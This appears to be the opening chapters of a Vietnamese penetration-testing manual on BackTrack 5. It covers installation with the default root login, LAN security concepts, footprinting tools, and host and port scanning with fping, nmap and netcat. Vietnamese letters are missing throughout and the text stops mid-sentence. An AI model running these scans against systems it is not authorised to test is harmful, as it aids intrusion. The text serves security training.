Athena-Su dung BackTrack 5 de khai thac lo hong mang.pdf

1

TI LIU HNG DN V S DNG

BACKTRACK 5 KHAI THC L HNG

MNG TI TRUNG TM ATHENA

2

LI M U

u tin, xin gi li cm n chn thnh n thy V Thng Gim c

Trung tm o to v qun tr mng an ninh mng Athena v thy L nh Nhn

nhit tnh gip hon thnh ti liu ny.

Cho gi li cm n n cc anh ch nhn vin t vn nhn vin h tr k

thut ti Trung tm o to v qun tr mng Athena h tr v to iu kin hon

thnh d n an nin mng ng thi hn c giao.

Trn trng!

Nhm thc hin

Nguyn Sn Kh

Tn Pht

Nguyn Cao Thng

3

MC LC

Chng M u : GII THIU V BACKTRACK 5 ..................................... 6

I. Gii thiu ................................................................................................. 6

II. Mc ch .................................................................................................. 6

III. Ngun ti Backtrack : .............................................................................. 7

IV. Ci t ...................................................................................................... 8

1. Live DVD ............................................................................................. 8

2. Install .................................................................................................... 8

Chng 1: TM HIU VN BO MT MNG LAN ............................ 16

I. Gii thiu ............................................................................................... 16

II. Vn bo mt h thng v mng ......................................................... 16

1. Cc vn d chung v bo mt h thng v mng ............................... 16

2. Mt s khi nim v lch s bo mt h thng ................................... 16

3. Cc loi l hng bo mt v phng thc tn cng mng ch yu ... 17

Chng 2: FOOTPRINTING ........................................................................... 21

I. Gii thiu v Footprinting ..................................................................... 21

II. Cc bc thc hin Footprinting ........................................................... 21

1. Xc nh vng hot ng ca chng ta .............................................. 21

2. Cc thng tin c sn cng khai ........................................................... 21

3. Whois v DNS Enumeration .............................................................. 21

4. Thm d DNS ..................................................................................... 22

5. Thm d mng .................................................................................... 22

III. Phng php thc hin Footprinting ..................................................... 22

IV. Cc cng c thc hin Footprinting: ..................................................... 25

1. Sam Spade .......................................................................................... 25

2. Super Email Spider ............................................................................. 26

3. VitualRoute Trace .............................................................................. 27

4. Maltego ............................................................................................... 27

Chng 3: SCANNING ................................................................................... 28

4

I. Gii thiu ............................................................................................... 28

II. Chng nng ............................................................................................ 28

1. Xc nh h thng c ang hot ng hay khng? ............................ 28

2. Xc nh cc dch v ang chy hoc ang lng nghe. ...................... 31

3. Xc nh h iu hnh ........................................................................ 37

Chng 4: ENUMERATION .......................................................................... 39

I. Enumeration l g? ................................................................................. 39

II. Banner Grabbing .................................................................................... 39

III. Enumerating cc dch v mng .............................................................. 39

1. Http fingerprinting .............................................................................. 39

2. DNS Enumeration .............................................................................. 42

3. Netbios name ...................................................................................... 44

Chng 5: PASSWORD CRACKING ............................................................ 45

I. Gii Thiu .............................................................................................. 45

II. Cc K Thut Password Cracking ......................................................... 45

1. Dictionary Attacks/Hybrid Attacks .................................................... 45

2. Brute Forcing Attacks ........................................................................ 45

3. Syllable Attacks/Pre-Computed Hashes ............................................. 45

III. Cc Kiu Tn Cng Thng Gp .......................................................... 45

1. Active Password Cracking ................................................................. 45

2. Passive Password Cracking ................................................................ 46

3. Offline Password Cracking ................................................................ 46

IV. Cc cng c Password Cracking ............................................................ 46

1. Hydra .................................................................................................. 46

2. Medusa ............................................................................................... 48

V. Password Cracking Trn Cc Giao Thc .............................................. 51

1. HTTP (HyperText Tranfer Protocol) ................................................. 51

2. SSH (Secure Shell) ............................................................................. 58

3. SMB (Server Message Block) ............................................................ 61

4. RDP (Remote Desktop Protocol) ....................................................... 64

5

Chng 6: SYSTEM HACKING .................................................................... 67

I. GII THIU V METASPLOIT .......................................................... 67

1. Gii thiu ............................................................................................ 67

2. Cc thnh phn ca Metasploit .......................................................... 67

3. S dng Metasploit Framework ......................................................... 67

4. Gii thiu Payload Meterpreter .......................................................... 68

5. Cch phng chng .............................................................................. 70

II. Li MS10-046 (2286198) ...................................................................... 70

1. Gii thiu ............................................................................................ 70

2. Cc bc tn cng: ............................................................................. 71

3. Cch phng chng .............................................................................. 79

III. Li BYPASSUAC ................................................................................. 80

1. Gii thiu ............................................................................................ 80

2. Cc bc tn cng .............................................................................. 80

3. Cch phng chng .............................................................................. 85

Chng 7: WEB HACKING VI DVWA ...................................................... 86

I. Gii thiu ............................................................................................... 86

II. Hng dn ci t DVWA trn Backtrack ............................................ 86

1. Ti v ci t XAMPP ........................................................................ 86

2. Ti v ci t DVWA ......................................................................... 88

III. Cc k thut tn cng trn DVWA ......................................................... 92

1. XSS (Cross-Site Scripting) ................................................................. 92

2. SQL Injection ................................................................................... 100

TI LIU THAM KHO ................................................................................ 106

6

Chng M u : GII THIU V BACKTRACK 5

I. Gii thiu

Backtrack l mt bn phn phi dng Live DVD ca Linux, c pht trin th

nghim thm nhp. Trong cc nh dng Live DVD, chng ta s dng c th

Backtrack trc tip t a DVD m khng cn ci n vo my ca chng ta. Backtrack

cng c th c ci t vo cng v s dng nh mt h iu hnh. Backtrack l s

hp nht gia 3 bn phn phi khc nhau ca Linux v thm nhp th nghim -

IWHAX, WHOPPIX, v Auditor. Trong phin bn hin ti ca n (5), Backtrack c

da trn phin bn phn phi Linux Ubuntu 11.10. Tnh n ngy 19 thng by nm

2010, Backtrack 5 c ti v ca hn 1,5 triu ngi s dng. Phin bn mi nht

l Backtrack 5 R2

II. Mc ch

Cng c Backtrack c lch s pht trin kh lu qua nhiu bn linux khc

nhau. Phin bn hin nay s dng bn phn phi Slackware linux (Tomas M.

(www.slax.org)). Backtrack lin tc cp nht cc cng c, drivers,... hin ti Backtrack

c trn 300 cng c phc v cho vic nghin cu bo mt. Backtrack l s kt hp

gia 2 b cng c kim th bo mt rt ni ting l Whax v Auditor.

Backtrack 5 cha mt s cng c c th c s dng trong qu trnh th

nghim thm nhp ca chng ta. Cc cng c kim tra thm nhp trong Backtrack 5,0

c th c phn loi nh sau:

Information gathering: loi ny c cha mt s cng c c th c s

dng c c thng tin lin quan n mt mc tiu DNS, nh tuyn, a

ch e-mail, trang web, my ch mail, v nh vy. Thng tin ny c thu

thp t cc thng tin c sn trn Internet, m khng cn chm vo mi

trng mc tiu.

Network mapping: loi ny cha cc cng c c th c s dng kim

tra cc host ang tn ti, thng tin v OS, ng dng c s dng bi mc

tiu, v cng lm portscanning.

Vulnerability identification: Trong th loi ny, chng ta c th tm thy cc

cng c qut cc l hng (tng hp) v trong cc thit b Cisco. N cng

cha cc cng c thc hin v phn tch Server Message Block (SMB) v

Simple Network Management Protocol (SNMP).

Web application analysis: loi ny cha cc cng c c th c s dng

trong theo di, gim st cc ng dng web

7

Radio network analysis: kim tra mng khng dy, bluetooth v nhn

dng tn s v tuyn (RFID), chng ta c th s dng cc cng c trong th

loi ny.

Penetration: loi ny cha cc cng c c th c s dng khai thc cc

l hng tm thy trong cc my tnh mc tiu

Privilege escalation: Sau khi khai thc cc l hng v c truy cp vo cc

my tnh mc tiu, chng ta c th s dng cc cng c trong loi ny

nng cao c quyn ca chng ta cho cc c quyn cao nht.

Maintaining access: Cng c trong loi ny s c th gip chng ta trong

vic duy tr quyn truy cp vo cc my tnh mc tiu. Chng ta c th cn

c c nhng c quyn cao nht trc khi cc chng ta c th ci t

cng c duy tr quyn truy cp

Voice Over IP (VOIP): phn tch VOIP chng ta c th s dng cc cng

c trong th loi ny

Digital forensics: Trong loi ny, chng ta c th tm thy mt s cng c c

th c s dng lm phn tch k thut nh c c hnh nh a cng,

cu trc cc tp tin, v phn tch hnh nh a cng. s dng cc cng c

cung cp trong th loi ny, chng ta c th chn Start Backtrack Forensics

trong trnh n khi ng. i khi s i hi chng ta phi gn kt ni b a

cng v cc tp tin trao i trong ch ch c bo tn tnh ton vn.

Reverse engineering: Th loi ny cha cc cng c c th c s dng

g ri chng trnh mt hoc tho ri mt tp tin thc thi.

III. Ngun ti Backtrack :

Chng ta c th ti bn Backtrack 5 ti a ch: www.backtrack-linux.org/downloads/

C bn cho Vmware v file ISO

8

IV. Ci t

1. Live DVD

Nu chng ta mun s dng Backtrack m khng cn ci n vo cng, chng

ta c th ghi tp tin nh ISO vo a DVD, v khi ng my tnh ca chng ta vi

DVD. Backtrack sau s chy t a DVD. Li th ca vic s dng Backtrack l

mt DVD Live l n l rt d dng lm v chng ta khng cn phi gy ri vi cu

hnh my hin ti ca chng ta.

Tuy nhin, phng php ny cng c mt s nhc im. Backtrack c th

khng lm vic vi phn cng, v thay i cu hnh no c thc hin trn phn

cng lm vic s khng c lu vi a DVD Live. Ngoi ra, n l chm, v my

tnh cn phi ti cc chng trnh t a DVD.

2. Install

a) Ci t trong my tht:

Chng ta cn chun b mt phn vng ci t Backtrack. Sau chy

Backtrack Live DVD. Khi gp mn hnh login

Ta s dng username l root, pass l toor. Sau vo ch ha, ta g

startx v ta s vo ch ha ca Backtrack 5.

ci t Backtrack 5 n a cng ta chn tp tin c tn install.sh trn desktop

v tin hnh ci t. Tuy nhin, nu khng th tm thy tp tin, chng ta c th s dng

ubiquity ci t. s dng ubiquity, ta m Terminal g ubiquity.

9

Sau ca s ci t s hin th. Sau tr li 1 s cu hi nh thnh ph chng ta

ang sng, keyboard layout, phn vng a ci t, Sau tin hnh ci t.

b) Ci t trong my o:

im thun li l ta khng cn chun b mt phn vng cho Backtrack, v s

dng ng thi mt OS khc. Khuyt im l tc chm, khng dng c wireless

tr USB wireless.

Ta c th c th s dng file VMWare c cung cp bi BackTrack. T y

chng ta c BackTrack trn my o tht d dng v nhanh chng. Cu hnh trong file

VMWare l memory 768MB, hardisk :30GB, Network:NAT. s dng c card

mng tht, ta phi chn Netword l Briged

Di y lm mt s hnh nh khi ci BackTrack trn my o VMWare

To mt my o mi v cho ia BackTrack vo.

10

Giao din khi ng ca BackTrack

11

G startx vo ch ha trong BackTrack

ci t, click chn vo file Install BackTrack trn mn hnh Desktop

12

Chn ngn ng, chn Forward tip tc

Chn ni ca chng ta, chn Forward tip tc

13

Chn ngn ng bn phm, chn Forward tip tc

Chn phn vng ci.

14

Nhn Install bt u ci

Qu trnh ci bt u.

15

Sau khi hon tt, ch vic khi ng li l xong.

16

Chng 1: TM HIU VN BO MT MNG LAN

I. Gii thiu

An ninh an ton mng my tnh hon ton l vn con ngi, do vic a

ra mthnh lang php l v cc quy nguyn tc lm vic c th l cn thit. y,

hnhlang php l c th gm: cc iu khon trong b lut ca nh nc, cc vn

bndi lut,... Cn cc quy nh c th do tng t chc t ra cho ph hp vi

tngc im ring. Cc quy nh c th nh: quy nh v nhn s, vic s dng

my,s dng phn mm,... V nh vy, s hiu qu nht trong vic m bo an ninh

anton cho h thng mng my tnh mt khi ta thc hin trit gii php v

chnhsch con ngi.Tm li, vn an ninh an ton mng my tnh l mt vn

ln, n yucu cn phi c mt gii php tng th, khng ch phn mm, phn cng

my tnhm n i hi c vn chnh sch v con ngi. V vn ny cn phi

cthc hin mt cch thng xuyn lin tc, khng bao gi trit c v n

lunny sinh theo thi gian. Tuy nhin, bng cc gii php tng th hp l, c bit

lgii quyt tt vn chnh sch v con ngi ta c th to ra cho mnh s an

tonchc chn hn.

II. Vn bo mt h thng v mng

1. Cc vn d chung v bo mt h thng v mng

c im chung ca mt h thng mng l c nhiu ngi s dng chung

v phn tn v mt a l nn vic bo v ti nguyn (mt mt hoc s dng khng

hp l) phc tp hn nhiu so vi vic mi trng mt my tnh n l, hoc

mtngi s dng.Hot ng ca ngi qun tr h thng mng phi m bo cc

thng tin trnmng l tin cy v s dng ng mc ch, i tng ng thi m bo

mng hotng n nh khng b tn cng bi nhng k ph hoi. Nhng trn thc t

l khng mt mng no m bo l an ton tuyt i, mth thng d c bo v

chc chn n mc no th cng c lc b v hiu ha binhng k c xu.

2. Mt s khi nim v lch s bo mt h thng

a) i tng tn cng mng (intruder)

i tng l nhng c nhn hoc t chc s dng nhng kin thc v

mngv cc cng c ph hoi (gm phn cng hoc phn mm) d tm cc im

yuv cc l hng bo mt trn h thng, thc hin cc hot ng xm nhp v

chimot ti nguyn tri php.Mt s i tng tn cng mng nh:Hacker: l nhng

k xm nhp vo mng tri php bng cch s dng cccng c ph mt khu hoc

khai thc cc im yu ca thnh phn truy nhp trn hthngMasquerader : L nhng

1X42FHighlight

1X42FHighlight

17

k gi mo thng tin trn mng nh gi mo a chIP, tn min, nh danh ngi

dngEavesdropping: L nhng i tng nghe trm thng tin trn mng, s

dngcc cng c Sniffer, sau dng cc cng c phn tch v debug ly c

ccthng tin c gi tr. Nhng i tng tn cng mng c th nhm nhiu mc ch

khc nhau nhn cp cc thng tin c gi tr v kinh t, ph hoi h thng mng c ch

nh, hocc th l nhng hnh ng v thc

b) Cc l hng bo mt

Cc l hng bo mt l nhng im yu trn h thng hoc n cha

trongmt dch v m da vo k tn cng c th xm nhp tri php vo h thng

thc hin nhng hnh ng ph hoi chim ot ti nguyn bt hp php.C nhiu

nguyn nhn gy ra nhng l hng bo mt: c th do li ca bnthn h thng, hoc

phn mm cung cp hoc ngi qun tr yu km khng hiusu v cc dch v cung

cpMc nh hng ca cc l hng ti h thng l khc nhau. C l hngch nh

hng ti cht lng dch v cung cp, c l hng nh hng ti ton b hthng hoc

ph hy h thng

c) Chnh sch bo mt

Chnh sch bo mt l tp hp cc quy tc p dng cho nhng ngi

thamgia qun tr mng, c s dng cc ti nguyn v cc dch v mng.

i vi tng trng hp phi c chnh sch bo mt khc nhau. Chnh

sch bo mt gip ngi s dng bit trch nhim ca mnh trong vic

bo v cc tinguyn trn mng, ng thi cn gip cho nh qun tr mng thit lp

cc bin phpm bo hu hiu trong qu trnh trang b, cu hnh v kim sot hot

ng ca hthng v mng.

3. Cc loi l hng bo mt v phng thc tn cng mng ch yu

a) Cc loi l hng

C nhiu cc t chc tin hnh phn loi cc dng l hng c bit.

Theo b quc phng M cc loi l hng c phn lm ba loi nh sau:

L hng loi C

Cho php thc hin cc hnh thc tn cng theo DoS(Denial of Services- T

chi dch v) Mc nguy him thp ch nh hng ticht lng dch v, lm ngng

tr, gin on h thng, khng lm ph hng d liuhoc t c quyn truy cp bt

hp php.DoS l hnh thc tn cng s dng cc giao thc tng Internet trong bgiao

thc TCP/IP lm h thng ngng tr dn n tnh trng t chi ngi sdng hp

php truy nhp hay s dng h thng.Cc dch v c l hng cho php cc cuc tn

cng DoS c th c nngcp hoc sa cha bng cc phin bn mi hn ca cc nh

1X42FHighlight

1X42FHighlight

1X42FHighlight

1X42FHighlight

1X42FHighlight

1X42FHighlight

18

cung cp dch v. Hinnay cha c mt bin php hu hiu no khc phc tnh

trng tn cng kiu nyv bn thn thit k tng Internet (IP) ni ring v b giao

thc TCP/IP ni chung n cha nhng nguy c tim tang ca cc l hng loi ny.

L hng loi B:

Cho php ngi s dng c thm cc quyn trn h thng m khng cn kim

tra tnh hp l dn n mt mt thng tin yu cu cn bo mt.L hng ny thng c

trong cc ng dng trn h thng . C mc nguy him l trung bnh.L hng loi B

ny c mc nguy him hn l hng loi C. Cho phpngi s dng ni b c th

chim c quyn cao hn hoc truy nhpkhnghp php.

Nhng l hng loi ny thng xut hin trong cc dch v trn h thng. Ng

s dng local c hiu l ngi c quyn truy nhp vo h thng vimt s quyn

hn nht nh. Tm hiu vn bo mt mng LAN. Mt dng khc ca l hng loi B

xy ra vi cc chng trnh vit bng m ngun C. Nhng chng trnh vit bng m

ngun C thng s dng mt vngm, mt vng trong b nh s dng lu tr d

liu trc khi x l. Ngi lptrnh thng s dng vng m trong b nh trc khi

gn mt khong khng gian b nh cho tng khi d liu. V d khi vit chng trnh

nhp trng tn ngi sdng quy nh trng ny di 20 k t bng khai bo:Char

first_name [20]; Khai bo ny cho php ngi s dng nhp ti a 20k t. Khi nhp

d liu ban u d liu c lu vng m. Khi ngi s dngnhp nhiu hn 20 k

t s trn vng m. Nhng k t nhp tha s nm ngoivng m khin ta khng th

kim sot c. Nhng i vi nhng k tn cngchng c th li dng nhng l hng

ny nhp vo nhng k t c bit thcthi mt s lnh c bit trn h thng.

Thng thng nhng l hng ny c lidng bi nhng ngi s dng trn h

thng t c quyn root khng hp l. hn ch c cc l hng loi B phi

kim sot cht ch cu hnh h thng vcc chng trnh.

L hng loi A

Cho php ngi ngoi h thng c th truy cp bt hp phpvo h thng. C

th lm ph hu ton b h thng. Loi l hng ny c mc rtnguy him e da

tnh ton vn v bo mt ca h thng. Cc l hng ny thngxut hin nhng h

thng qun tr yu km hoc khng kim sot c cu hnhmng. Nhng l hng loi

ny ht sc nguy him v n tn ti sn c trn phnmm s dng, ngi qun tr

nu khng hiu su v dch v v phn mm s dngc th b qua im yu ny. V

vy thng xuyn phi kim tra cc thng bo cacc nhm tin v bo mt trn mng

pht hin nhng l hng loi ny. Mt lotcc chng trnh phin bn c thng s

dng c nhng l hng loi A nh: FTP,Gopher, Telnet, Sendmail, ARP, finger.

1X42FHighlight

1X42FHighlight

1X42FHighlight

1X42FHighlight

1X42FHighlight

19

b) Cc hnh thc tn cng mng ph bin

Scanner

Scanner l mt chng trnh t ng r sot v pht hin nhng im yu v

bo mt trn mt trm lm vic cc b hoc mt trm xa. Mt k ph hoi s dng

chng trnh Scanner c th pht hin ra nhng l hng v bo mt trn mtServer d

xa.C ch hot ng l r sot v pht hin nhng cng TCP/UDP c s dng trn

h thng cn tn cng v cc dch v s dng trn h thng . Scanner ghi li nhng

p ng trn h thng t xa tng ng vi dch v m n pht hinra. T n c th

tm ra im yu ca h thng. Nhng yu t mt Scanner hot ng nh sau:Yu

cu thit b v h thng: Mi trng c h tr TCP/IPH thng phi kt ni vo mng

Internet.Cc chng trnh Scanner c vai tr quan trng trong mt h thng bo mt,v

chng c kh nng pht hin ra nhng im yu km trn mt h thng mng.

Password Cracker

L mt chng trnh c kh nng gii m mt mt khu c m hohoc c

th v hiu ho chc nng bo v mt khu ca mt h thng.Mt s chng trnh ph

kho c nguyn tc hot ng khc nhau. Mt schng trnh to ra danh sch cc t

gii hn, p dng mt s thut ton m ho t kt qu so snh vi Password m ho

cn b kho to ra mt danh sch khctheo mt logic ca chng trnh.Khi thy

ph hp vi mt khu m ho, k ph hoi c c mt khudi dng text .

Mt khu text thng thng s c ghi vo mt file.Bin php khc phc i vi

cch thc ph hoi ny l cn xy dng mtchnh sch bo v mt khu ng n.

Sniffer

Sniffer l cc cng c (phn cng hoc phn mm)bt cc thng tin

luchuyn trn mng v ly cc thng tin c gi tr trao i trn mng.Sniffer c th

bt c cc thng tin trao i gia nhiu trm lm vic vinhau. Thc hin bt cc

gi tin t tng IP tr xung. Giao thc tng IP c nhngha cng khai, v cu trc

cc trng header r rng, nn vic gii m cc gi tin ny khng kh khn.

Mc ch ca cc chng trnh sniffer l thit lp ch promiscuous(mode

dng chung) trn cc card mng ethernet - ni cc gi tin trao i trongmng - t

"bt" c thng tin.Cc thit b sniffer c th bt c ton b thng tin trao i trn

mng lda vo nguyn tc broadcast (qung b) cc gi tin trong mng Ethernet.Tuy

nhin vic thit lp mt h thng sniffer khng phi n gin v cn phi xm nhp

c vo h thng mng v ci t cc phn mm sniffer.ng thi cc chng

trnh sniffer cng yu cu ngi s dng phi hiusu v kin trc, cc giao thc

mng.Vic pht hin h thng b sniffer khng phi n gin, v sniffer hot ng

tng rt thp, v khng nh hng ti cc ng dng cng nh cc dch v hthng

1X42FHighlight

1X42FHighlight

1X42FHighlight

1X42FHighlight

1X42FHighlight

1X42FHighlight

1X42FHighlight

1X42FHighlight

20

cung cp.Tuy nhin vic xy dng cc bin php hn ch sniffer cng khng qu

khkhn nu ta tun th cc nguyn tc v bo mt nh:

Khng cho ngi l truy nhp vo cc thit b trn h thng

Qun l cu hnh h thng cht ch

Thit lp cc kt ni c tnh bo mt cao thng qua cc c ch m ho.

Trojans

Trojans l mt chng trnh chy khng hp l trn mt h thng. Vi vaitr

nh mt chng trnh hp php. Trojans ny c th chy c l do cc chngtrnh

hp php b thay i m ca n thnh m bt hp php.V d nh cc chng trnh

virus l loi in hnh ca Trojans. Nhngchng trnh virus thng che du cc on

m trong cc chng trnh s dng hp php. Khi nhng chng trnh ny c kch

hot th nhng on m n du sthc thi v chng thc hin mt s chc nng m

ngi s dng khng bit nh: ncp mt khu hoc copy file m ngi s dng nh

ta thng khng hay bit.Mt chng trnh Trojans s thc hin mt trong nhng cng

vic sau:

Thc hin mt vi chc nng hoc gip ngi lp trnh ln n pht hinnhng

thng tin quan trng hoc nhng thng tin c nhn trn mt h thng hocch trn mt

vi thnh phn ca h thng .

Che du mt vi chc nng hoc l gip ngi lp trnh pht hin nhngthng

tin quan trng hoc nhng thng tin c nhn trn mt h thng hoc ch trnmt vi

thnh phn ca h thng. Ngoi ra cn c cc chng trnh Trojan c th thc hin

c c hai chc nngny. C chng trnh Trojan cn c th ph hy h thng bng

cch ph hoi ccthng tin trn cng. Nhng ngy nay cc Trojans kiu ny d dng

b pht hin vkh pht huy c tc dng.Tuy nhin c nhng trng hp nghim

trng hn nhng k tn cng to ranhng l hng bo mt thng qua Trojans v k tn

cng ly c quyn root trnh thng v li dng quyn ph hy mt phn

hoc ton b h thng hocdng quyn root thay i logfile, ci t cc chng

trnh trojans khc m ngiqun tr khng th pht hin c gy ra mc nh

hng rt nghim trng vngi qun tr ch cn cch ci t li ton b h thng.

1X42FHighlight

21

Chng 2: FOOTPRINTING

I. Gii thiu v Footprinting

L mt k thut tm kim thng tin v mt danh nghip, c nhn hay t

chc.

Mt trong 3 giai on cn phi lm thc hin mt cuc tn cng.

Mt k tn cng dnh 90% thc hin vic thu thp v tim kim

thng tin v 10% thc hin tn cng.

Kt qu ca qu trnh Footprinting l ly c thng tin c bn ca mc

tiu tn cng: Tn, a ch cng ty, website, cc thnh vin trong cng ty,

s mng,

Cc thng tin cn tm kim:

Internet: Domain, Network blocks, IP, TCP hay UDP, System

Enumeration, ACLs, IDSes,

Intranet

Remote access: Remote system type,

Extranet: Connection origination and destination,

II. Cc bc thc hin Footprinting

Bao gm cc bc sau:

1. Xc nh vng hot ng ca chng ta

Th u tin trong kinh doanh l xc nh vng hot ng ca cc hot ng

footprinting ca chng ta. N c th l mt nhim v nn lng xc nh tt c cc

thc th trong mt t chc no . Tuy nhin, hacker chng thng cm cho cuc chin

ca chng ta. H khai thc cc im yu trong bt c cc biu mu no. Chng ta

khng mun hacker bit nhiu v tnh trng bo mt ca chng ta.

2. Cc thng tin c sn cng khai

Lng thng tin m n sn sng sn c cho chng ta, t chc chng ta v bt c

nhng g chng ta c th hnh dung th chng l g thiu tnh tuyt vi.

Nhng thng tin c th bao gm: trang web ca cng ty; cc t chc quan h; v

tr ta lc; thng tin chi tit v nhn vin; cc s kin hin ti; cc chnh sch bo mt

v s ring t.

3. Whois v DNS Enumeration

Xem chi tit thng tin v a ch IP, name server, dns server

1X42FHighlight

1X42FHighlight

1X42FHighlight

22

4. Thm d DNS

Sau khi xc nh tt c cc domain c lin quan, chng ta bt u truy vn

DNS. DNS l mt c s d liu phn tn dng nh x cc a ch IP thnh

hostname. Nu DNS khng c cu hnh mt cch bo mt, rt c kh nng ly c

cc thng tin bi l t t chc.

5. Thm d mng

By gi th chng ta xc nh c cc mng tim nng, chng ta c th xc

nh m hnh mng cng nh ng truy cp c kh nng vo mng

III. Phng php thc hin Footprinting

C 2 phng php thc Footprinting:

Active Footprinting: lin h trc tip vi mc tiu, tm hiu thng tin

cn thit

Passive Footprinting: Tm kim thng qua cc bi bo, trang web,

hoc t cc i th mc tiu,

Website: www.google.com ,

http://whois.domaintools.comwww.whois.net , www.tenmien.vn ,

www.arcchive.org ,

1X42FHighlight

1X42FHighlight

1X42FHighlight

1X42FHighlight

23

Whois : athena.com.vn

24

Tenmien.vn

25

Archive: http://www.microsoft.com

IV. Cc cng c thc hin Footprinting:

Sam Spade, Super email spider, VitualRoute Trace, Google Earth, Whois, Site

Digger, Maltego,

1. Sam Spade

Cho php ngi s dng c th thc hin cc hnh ng: Ping, Nslookup,

Whois, Traceroute,

1X42FHighlight

1X42FHighlight

26

2. Super Email Spider

Tm kim thng tin v a ch email ca c quan t chc s dng Search

Engine: Google, Lycos, iWon, Exiter, Hotbot, MSN, AOL,

1X42FHighlight

27

3. VitualRoute Trace

Hin th cc ng ni kt, a ch, khu vc ng kt ni i qua.

4. Maltego

L cng c dng pht hin cc lin kt gia: Ngi s dng, c quan, t

chc, website, domain, di mng, a ch IP,

1X42FHighlight

28

Chng 3: SCANNING

I. Gii thiu

Nu footprinting l vic xc nh ngun thng tin ang u th scanning l

vic tm ra tt c cc cnh ca xm nhp vo ngun thng tin . Trong qu trnh

footprinting, chng ta t c danh sch dy mng IP v a ch IP thng qua

nhiu k thut khc nhau bao gm whois v truy vn ARIN. K thut ny cung cp

cho nh qun tr bo mt cng nh hacker nhiu thng tin co gi tr v mng ch, dy

IP, DNS servers v mail servers. Trong chng ny, chng ta s xc nh xem h

thng no ang lng nghe trn giao thng mng v c th bt c qua vic s dng

nhiu cng c v k thut nh ping sweeps, port scan. Chng ta c th d dng vt

tng la bng tay (bypass firewalls) scan cc h thng gi s nh n ang b kha

bi chnh sch trch lc (filtering rules).

II. Chng nng

1. Xc nh h thng c ang hot ng hay khng?

Mt trong nhng bc c bn lp ra mt mng no l ping sweep trn mt

dy mng v IP xc nh cc thit b hoc h thng c ang hot ng hay khng.

Ping thng c dng gi cc gi tin ICMP ECHO ti h thng ch v c gng

nhn c mt ICMP ECHO REPLY bit h thng ang hot ng. Ping c th

c chp nhn xc nh s lng h thng cn sng c trong mng trong mng

va v nh ( Lp C c 254 v B c 65534 a ch) v chng ta c th mt hng gi,

hng ngy hon thnh cho nhnh mng lp A 16277214 a ch.

a) Netword Ping Sweeps

Netword pinging l hnh ng gi cc loi ca giao thng mng ti ch v

phn tch kt qu. Pinging s dng ICMP (Internet Control Message Protocol). Ngoi

ra, n cn s dng TCP hoc UDP tm host cn sng.

thc hin ICMP ping sweep, ta c th s dng fping, nmap,.

Fping a g 192.168.10.1 192.168.10.10

-a hin thi host ang sng: alive

-g dy a ch: 192.168.10.0/24 or nh trn

1X42FHighlight

1X42FHighlight

29

Nmap sP PE 192.168.10.0/24

-sP: ping scan

-PE: ping echo

30

Phng chng: chng ta c th dng pingd gi tt c cc giao thng mng

ICMP ECHO v ICMP ECHO REPLY cp host. im ny t

c bng cch g b s h tr ca vic x l ICMP ECHO t nhn h

thng. V mt c bn, n cung cp mt c ch iu khin truy cp mc

h thng.

b) ICMP query

Ping sweeps (or ICMP ECHO packets) c th ni ch l nh u ca tng

bng khi ni n thng tin ICMP v mt h thng. chng ta c th thu thp nhiu loi

thng tin c gi tr n gin bng cch cc gi tin ICMP. Chng ta c th yu cu mt

n mng ca mt thit b no vi Address Mask Request. Mt n mng rt quan

trng v chng ta c th xc nh c tt c a ch ca ch, bit c gatewate mt

nh, a ch broadcast. Nh vo gateway mc nh, chng ta c th tn cng router.

Vi a ch broadcast. Nhng khng phi tt c cc router no cng h tr Time v

Netmask.

Phng chng: Kha loi ICMP m cung cp thng tin ti router bin

(router i ra ISP). gim ti mc thiu, chng ta nn dng access list

(ACLs):

o Access-list 101 deny icmp any any 13 // yu cu timestamp

o Access-list 101 deny icmp any any 17 // yu cu address mask

31

2. Xc nh cc dch v ang chy hoc ang lng nghe.

a) Port Scanning

Port scanning l qu trnh gi cc gi tin ti cng TCP v UDP trn h

thng ch xc nh dch v no ang chy hoc trong tnh trng ang lng nghe.

Vic xc nh ang lng nghe l rt quan trng xc nh cc dch v ang chy.

Thm vo , chng ta c th xc nh loi v phin bn h iu hnh ang chy v

ng dng ang x dng.

b) Cc Loi Scan

Trc khi thc hin port scanning, chng ta nn im qua mt s cch thc

qut sn c:

TCP Connect scan: loi ny kt ni ti cng ch v thc hin y

quy trnh bt tay ba bc (SYN, SYN/ACK, ACK). Tuy nhin iu ny

th d dng b pht hin bi h thng ch. N s dng li gi h thng

thay cho cc gi tin sng (raw packets) v thng c s dng bi

nhng ngi dng Unix khng c quyn.V SYN Scan khng th thc

hin c.

TCP SYN scan: n khng to ra mt kt ni ti ngun m ch gi gi

tin SYN(bc u tin trong ba bc to kt ni) ti ch. Nu a gi tin

SYN/ACK c tr v th chng ta bit c cng ang lng nghe.

Ngc li, nu nhn c RST/ACK th cng khng lng nghe. K

thut ny kh b pht hin hn l TCP connect v n khng lu li

32

thng tin my tnh ch. Tuy nhin, mt trong nhng nhc im ca

k thut ny l c th to ra iu kin t chi dch v DoS nu c qu

nhiu kt ni khng y c to ra. V vy, k thut ny l an ton

nu khng c qu nhiu kt ni nh trn c to ra.

TCP ACK Scan: k thut ny c dng vch ra cc quy tt thit lp

tng la. n c th gip xc nh xem tng la l trnh trch lc cc

gi tin n gin cho php to kt ni hay l trnh trch lc nng cao.

Tuy nhin n khng th phn bit c cng no open hay closed.

TCP Windows Scan: Ging vi ACK Scan, im khc l n c th pht

hin cng open vi closed.

UDP Scan: k thut ny gi mt gi tin UDP ti cng ch. Nu cng

ch tr li vi thng ip ICMP port unreachable th cng closed.

Nu khng nhn c thng ip trn th cng trn ang m. Tuy

nhin, UDP scan l mt qu trnh rt chp nu nh chng ta c gng

scan mt thit b no m c p chnh sch trch lc gi tin mnh.

TCP FIN, XMAS, NULL: chng chuyn nghip trong vic ln lt vt

tng la khm ph cc h thng pha sau. Tuy nhin, chng li

ph thuc nhiu vo cch x l ca h thng ch m(in hnh l

Windows) th khng c biu hin g.

c) Xc nh cc dch v TCP v UDP ang chy

Strobe: c tin cy cao, tuy nhin ch h tr TCP, khng h tr UDP

33

Netcat l mt tin ch mng Unix n gin tnh nng c v ghi d liu

qua kt ni mng, s dng giao thc TCP / IP.N c thit k nh l

mt cng c ng tin cy "back-end" c th c s dng trc tip hoc

d dng iu khin bi cc chng trnh v cc script khc. ng thi,

n l cng c g li mng vi nhiu tnh nng v cng c thm d.

Nc v z w2 192.168.10.102 1-4000

-v: xut chi tit ra mn hnh

-z: zero-I/O mode khng gi d liu no ch pht ra mt gi tin.

192.168.10.102: host

1-4000: port cn qut.

Nmap (Network Mapper) l mt tin ch ngun m min ph cho pht

